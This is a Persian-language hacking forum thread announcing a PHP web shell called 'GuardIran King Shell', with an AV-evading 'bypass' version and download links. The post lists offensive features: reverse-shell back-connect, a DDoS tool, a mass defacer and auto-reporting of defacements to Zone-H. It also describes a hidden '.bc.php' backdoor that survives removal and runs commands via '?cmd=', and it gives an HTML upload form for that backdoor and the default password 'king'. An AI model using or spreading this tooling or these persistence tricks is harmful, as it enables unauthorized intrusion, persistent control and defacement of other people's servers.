Phoen1X

GuardIran King Shell

2 ارسال در این موضوع قرار دارد

به نام خدا

logo.png

 

چند وقتی هست که طراحی و برنامه نویسی این شل تمام شده اما باید مدتی مورد تست قرار می گرفت تا از درست کار کردنش مطمئن میشدم خب GuardIran King Shell شل جدیدی هست که در دو ورژن معمولی (امکانات بیشتر) و بایپس (توسط هیچ نرم افزار امنیتی شناخته نمی شه) برنامه نویسی شده که امکانات فوق العاده ایی داره فعلا این شل در ورژن 1 بتا هستش پس امکان داره باگی وجود داشته باشه و من هنوز اون رو پیدا نکرده باشم برای همین اگر باگی مشاهده کردید به بنده اطلاع بدید تا در ورژن بعدی فیکس بشه . طراحی این شل با استفاده از فریمورک bootstrap 3 و بر اساس جدید ترین الگوی طراحی یعنی Google Material Design , طراحی شده که میتونید از اینجا اطلاعات بیشتری دریافت کنید . این شل در سه رنگ آبی , بنفش و سبز طراحی شده

teal.thumb.PNG.f09418aef5a0fa4e07fbd87ebb2e1612.PNG

خب از طراحیش که بگذریم به مهم ترین قسمت یعنی امکاناتش میرسیم که به شرح زیر هستش :

- ساخت , ادیت , تغییر  پرمیژن و تغییر نام فایل و دایرکتوری

- آپلود فایل

- بک کانکت گیری

- ساخت بکدور به صورت اتوماتیک

- CGI Telnet 

- اتصال به دیتابیس mysql

- خواندن اطلاعات از روی دیتابیس mysql

- تغییر مقادیر کالومن ها

- تبدیل متن به base 64 , md5 ,sha1 , urlencode

- دیکود متن از urlencode , base64

- اجرای کد های php روی سرور با استفاده از eval

- بایبیس safe mode

- پورت اسکنر

- دیداسر

- مس دیفیسر

- ثبت کننده اتوماتیک در zone h و aljyyosh

- کارکرد مطلوب در سرور های ویندوزی (در صورتی که کامپایلر php نصب باشه)

در مورد بکدوری که میسازه هربار که شل اجرا میشه یک فایل به نام .bc.php در کنارش ساخته میشه که اگر ادمین شل شمارو پاک کرد این فایل باقی بمونه و همونطور که میدونید فایل هایی که با . شروع بشن به صورت دیفالت در سی پنل نمایش داده نمی شن . استفاده از این بکدور به این صورت هستش که وقتی به آدرس بکدور میرید با یک صفحه خالی مواجه میشید اما کافیه در کنار ادرس عبارت ?cmd= بنویسید و بعد کامندی که میخواید روی سرور اجرا بشه اگر شرکت هاست دهنده فانکشن system رو نبسته باشه کامند شما اجرا و نتایج نمایش داده میشن و قابلیت دیگه این بکدور اینه که میتونید فایل اپلود کنید برای این کار از کدهای html زیر استفاده کنید و به جای .bc.php ادرس همون فایل بکدور رو بذارید


<form method="post" enctype="multipart/form-data" action="bc.php">
<input type="file" name="fileToUp"><input type="submit" value="OK" name="fileSubmit">
</form>

پسورد شل king هستش و میتونید به هرچی دوست دارید رو جاش بذارید فقط کافیه متغییر $pass رو عوض کنید.

پسور Cgi-telnet هم king هست

دوستانی که مایل باشن در برنامه نویسی شل به بنده کمک کنن میتونن اسکریپتی که میخوان در شل قرار بگیره رو برای من پ.خ کنن . همچنین هرگونه کپی برداری , ادیت , تغییر محتویات و ... مجاز و از نظر بنده هیچ مشکلی نداره

همچنین این شل توسط DeMoN تست و تایید شده.

 

shell.rar

bypass_shell.rar

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

آپدیت :) 

ورژن 1.0.0  Fix

در این ورژن مشکل عقب گرد دایرکتوری حل شده و همینطور هم تغییر دایرکتوری هم آسان تر شده و در ابتدا دایرکتوری ها به نمایش در میان و بعد فایل ها همینطور قسمت ثبت دیفیس ها در aljyyosh هم فعلا غیر فعال شده :) 

به زودی با ورژن 2 در خدمت شما هستم که از امکانات بیشتر , طراحی بهتر و استفاده از تکنولوژی ajax بهره میبرد

Capture.PNG

 

 

bypass.php

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری